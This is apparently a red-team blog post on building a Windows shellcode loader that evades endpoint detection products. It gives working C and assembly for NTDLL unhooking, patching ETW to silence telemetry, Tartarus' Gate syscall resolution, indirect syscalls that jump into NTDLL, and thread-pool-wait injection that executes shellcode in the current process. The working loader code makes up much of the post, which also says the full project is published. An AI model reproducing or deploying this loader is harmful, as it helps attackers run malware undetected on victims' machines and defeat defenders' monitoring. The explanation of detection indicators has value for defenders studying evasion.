As Red Teamers, we need an OPSEC safe method to execute shellcode via a range of initial access vectors. Things are getting more and more difficult with Endpoint Detection and Response (EDR) products improving, making it more challenging to get an implant.

This post is going to present a slightly new method for bypassing EDR, commonly known as CreateThreadPoolWait. However, instead of using kernel32.dll we will use ntdll.dll.

github GitHub:

The loader published above uses the the bypass technique introduced within this article.

We as Red Teamers need to consider what detection mechanisms EDR solutions are using, in order to create an effective loader for evasion. A few of the main options that EDR have at their disposal to obtain telemetry are:

  • User mode hooking against multiple APIs
  • EtwTi for telemetry against specific actions like allocations on executable pages, etc…
  • ETW / AMSI event telemetry
  • Kernel Callbacks
  • Minifilter driver

Let’s review some of the choices often used by loaders.

  • Bad OPSEC #1 – Strings that hint to malicious actions
  • Bad OPSEC #2 – Unhooking
  • Bad OPSEC #3 – Private bytes (Patching)
  • Bad OPSEC #4 – Hell’s Gate

Some of the above are going to be addressed below, whilst others are left as an exercise for the reader.

Bad OPSEC #1 – Strings

There are multiple ways to approach hiding strings in binaries. In general, the most common reasons for strings within malicious binaries are DLL loading and resolving their exported functions.

We’re not going to focus too much on this issue here, but often strings can be obfuscated through encoding or encryption. Another method used more and more recently is hashing the strings and comparing them in real time – ideal for API resolving and DLL loading.

Bad OPSEC #2 – Unhooking

This is a huge subject to go into; avoiding user space hooks by EDRs.

It is worth mentioning that Microsoft is not a fan of EDR companies hooking all these functions since there are other ways to approach obtaining telemetry, rather than performing shady hooks in DLLs. Some of the more effective and advanced EDRs do not hook any DLLs, such as Microsoft Defender for Endpoint or Elastic.

Let’s try to see which techniques are most common for threat actors to use and why they could be better; there are multiple projects available online where loaders use the unhooking method of loading a second NTDLL (which is an IOC by itself) – changing the protection of the main NTDLL to RWX via VirtualProtect, replacing the hooked section of the main NTDLL from the second one, and then again using VirtualProtect to restore the original permissions.

There are unfortunately many IOCs in the method explained above, and in addition to this, a lot of code reviewed was found to have copied the below code for unhooking.

GetModuleInformation(process, ntdllModule, &mi, sizeof(mi));
LPVOID ntdllBase = (LPVOID)mi.lpBaseOfDll;
HANDLE ntdllFile = CreateFileA("c:\\windows\\system32\\ntdll.dll", GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
HANDLE ntdllMapping = CreateFileMapping(ntdllFile, NULL, PAGE_READONLY | SEC_IMAGE, 0, 0, NULL);
LPVOID ntdllMappingAddress = MapViewOfFile(ntdllMapping, FILE_MAP_READ, 0, 0, 0);

PIMAGE_NT_HEADERS hookedNtHeader = (PIMAGE_NT_HEADERS)((DWORD_PTR)ntdllBase + hookedDosHeader->e_lfanew);

for (WORD i = 0; i < hookedNtHeader->FileHeader.NumberOfSections; i++) {
    if (!strcmp((char*)hookedSectionHeader->Name, (char*)".text")) {
        DWORD oldProtection = 0;
        bool isProtected = VirtualProtect((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress), hookedSectionHeader->Misc.VirtualSize, PAGE_EXECUTE_READWRITE, &oldProtection);
        memcpy((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress), (LPVOID)((DWORD_PTR)ntdllMappingAddress + (DWORD_PTR)hookedSectionHeader->VirtualAddress), hookedSectionHeader->Misc.VirtualSize);
        isProtected = VirtualProtect((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress), hookedSectionHeader->Misc.VirtualSize, oldProtection, &oldProtection);


Most people, however, do not realize that there is a mistake at the end of the code and CloseHandle(ntdllMapping) does not remove the second NTDLL loaded.

The use of FreeLibrary is also a mistake, since it tries to free the main NTDLL which is not possible due to the way Windows processes work. Effectively, the process will have loaded two copies of NTDLL, which in the eyes of an experienced threat hunter or an EDR solution, is most likely a hint to a malicious process.

Bad OPSEC #3 – Private bytes (Patching)

“Private bytes” IOCs usually exist when the loader tries to unhook a DLL, as is the case in the previous example at the stage where a section of NTDLL is copied from the second version and loaded into the first.

There are other instances where threat actors perform patching, like in this case against ETW and AMSI patching. The method is similar to the NTDLL unhooking but instead of replacing a whole section, threat actors do the same thing EDRs do – they insert a set of instructions in the beginning of the AMSI or ETW function in order to return (exit) from the function.

In the below code, which consists of patching AMSI’s exported function, AmsiScanBuffer, it is clear that the exact same IOCs exist as in the previous situation.

void patchETW(OUT HANDLE& hProc) {

    void* etwAddr = GetProcAddress(GetModuleHandle(L"ntdll.dll"), "EtwEventWrite");
    char etwPatch[] = { 0xC3 };
    DWORD lpflOldProtect = 0;
    unsigned __int64 memPage = 0x1000;
    void* etwAddr_bk = etwAddr;
    NtProtectVirtualMemory(hProc, (PVOID*)&etwAddr_bk, (PSIZE_T)&memPage, 0x04, &lpflOldProtect);
    NtWriteVirtualMemory(hProc, (LPVOID)etwAddr, (PVOID)etwPatch, sizeof(etwPatch), (SIZE_T*)nullptr);
    NtProtectVirtualMemory(hProc, (PVOID*)&etwAddr_bk, (PSIZE_T)&memPage, lpflOldProtect, &lpflOldProtect);
    std::cout << "[+] Patched etw!\n";


There are two VirtualProtect and private bytes IOCs, however, there is a way around this method by using HWBP (Hardware Breakpoint) hooking against those functions. This method works by hooking the function, and at the time the function is called, it replaces the behaviour with a different one – such as exiting the function of AmsiScanBuffer.

A public proof-of-concept for this method can be found here.

Bad OPSEC #4 – Hell’s Gate Direct Syscalls

Hell’s Gate is an excellent technique of manually going through NTDLL, finding the syscall IDs, and creating a stub which calls the syscall from our process.

Originally when this technique was released it was great – EDR solutions were not hooking – but given that these days a number of products hook offsets, the calculations can fail. Due to this, the technique was developed further with an update called Halo’s Gate, tackling this issue by performing some extra calculations in NTDLL’s memory to find the syscall ID.

There was one further update called Tartarus’ Gate – released because Halo’s Gate was not handling a hooking method of a specific EDR. This is a great method of avoiding unhooking IOCs, since for all of the above there is no need for any API such as VirtualProtect or WriteProcessMemory to be used. However, one IOC still exists, which is Direct Syscalls.

This is what the stub looks like:

HellDescent PROC
    mov r10, rcx
    mov eax, wSystemCall

HellDescent ENDP

This is an IOC that occurs because the call of syscall comes directly from the loader’s memory space and not the loaded NTDLL, which is easy to detect if a stack trace is reviewed.

The loader presented below will tackle this issue, as well as performing indirect syscall method which replaces the instruction of syscall in the stub with a JMP instruction to a valid syscall instruction in the NTDLL.

Creating the Loader

The task at hand is to create a loader with as few IOCs as possible and decide on the method of the injection. Most EDRs are more lenient for injections that happen in the same process, which is what the loader is going to do. For simplicity’s sake this loader will not focus on AMSI/ETW evasion – it will avoid using unhooking and use Tartarus’ Gate instead, in addition to the indirect syscall evasion. In summary, the loader will use:

  • Tartarus’ Gate
  • Indirect Syscall
  • A new injection method (kind of…)

As previously mentioned, Tartarus’ Gate will be used exactly in the same way but the stub needs to be changed accordingly for the indirect syscall, like below.

    id DWORD 000h
    jmptofake QWORD 00000000h


    setup PROC
        mov id, 000h
        mov id, ecx
        mov jmptofake, 00000000h
        mov jmptofake, rdx
    setup ENDP

    executioner PROC
        mov r10, rcx
        mov eax, id
        jmp jmptofake
    executioner ENDP

Initially the loader needs to obtain a syscall instruction memory address in the NTDLL, which is easy enough by trying to resolve a syscall like NtAddBootEntry at + 0x18 offset, where the syscall instruction is located.

By obtaining the above, resolving and calling the NTAPI function is performed as follows.

//Resolving ZwAllocateVirtualMemory
GetSyscallId(hNtdll, &SyscallId, (PCHAR)"ZwAllocateVirtualMemory");
setup(SyscallId, spoofJump);
NTSTATUS status = executioner((HANDLE)-1,&currentVmBase, NULL,&szWmResv,MEM_COMMIT,PAGE_READWRITE);

The GetSyscallId function will perform the Tartarus’ Gate checks to find the syscall ID, and then the setup function in the assembly will set the legitimate syscall instruction address and the ID in memory, so the syscall stub (aka executioner function) will execute the ZwAllocateVirtualMemory via the legitimate syscall instruction in the NTDLL.

The loader will perform ZwAllocateVirtualMemory to allocate the shellcode into memory with RW permissions, CopyMemoryEx which is a custom memcpy to write the shellcode in the allocated memory, and NtProtectVirtualMemory to change the permissions of the allocated page to RX.

The last part is the injection method that will use the functions TpAllocWait, TpSetWait and NtWaitForSingleObject.

This injection is based on CreateThreadPoolWait callback. It starts by using CreateEvent to create an event object in a signalled state, then uses TpAllocWait to create a wait object with the shellcode allocated address as the callback argument. The TpSetWait function will call the wait object’s callback function after the created event will be signaled or times out to execute the shellcode.

int main()
    auto hNtdll = GetModuleHandleA("ntdll.dll");
    DWORD SyscallId = 0;
    LPVOID spoofJump = ((char*)GetProcAddress(hNtdll, "NtAddBootEntry")) + 18; //Fetching the Syscall instruction address
    HANDLE c = CreateEventA(NULL, FALSE, TRUE, NULL);

    LPVOID currentVmBase = NULL;
    SIZE_T szWmResv = sizeof(buf);
    //Resolving ZwAllocateVirtualMemory
    GetSyscallId(hNtdll, &SyscallId, (PCHAR)"ZwAllocateVirtualMemory");
    setup(SyscallId, spoofJump);
    NTSTATUS status = executioner((HANDLE)-1,&currentVmBase, NULL,&szWmResv,MEM_COMMIT,PAGE_READWRITE);
    //Allocating space in memory for shellcode

    CopyMemoryEx(currentVmBase, buf, szWmResv);
    //Avoiding hooks with custom copying on current process

    //Resolving NtProtectVirtualMemory
    DWORD oldProt;
    GetSyscallId(hNtdll, &SyscallId, (PCHAR)"NtProtectVirtualMemory");
    setup(SyscallId, spoofJump);
    status = executioner((HANDLE)-1,&currentVmBase, &szWmResv,PAGE_EXECUTE_READ,&oldProt);

    //Resolving TpAllocWait
    HANDLE hThread = NULL;
    pTpAllocWait TpAllocWait = (pTpAllocWait)GetProcAddress(hNtdll, "TpAllocWait");
    status = TpAllocWait((TP_WAIT**)&hThread, (PTP_WAIT_CALLBACK)currentVmBase, NULL, NULL);

    //Resolving TpSetWait
    pTpSetWait TpSetWait = (pTpSetWait)GetProcAddress(hNtdll, "TpSetWait");
    TpSetWait((TP_WAIT*)hThread, c, NULL);

    //Resolving NtWaitForSingleObject
    GetSyscallId(hNtdll, &SyscallId, (PCHAR)"NtWaitForSingleObject");
    setup(SyscallId, spoofJump);
    status = executioner(c, 0, NULL);

Obviously, the above code generates an EXE which is not recommended to be used, but it can be easily turned to DLL or to a different execution vector. The full project has been published below.

github GitHub:

There is one more IOC in this execution method – since this in memory it will look like it executes an unbacked address (address that does not point to a file on disk), which is suspicious. Working around this will be left as an exercise to the reader.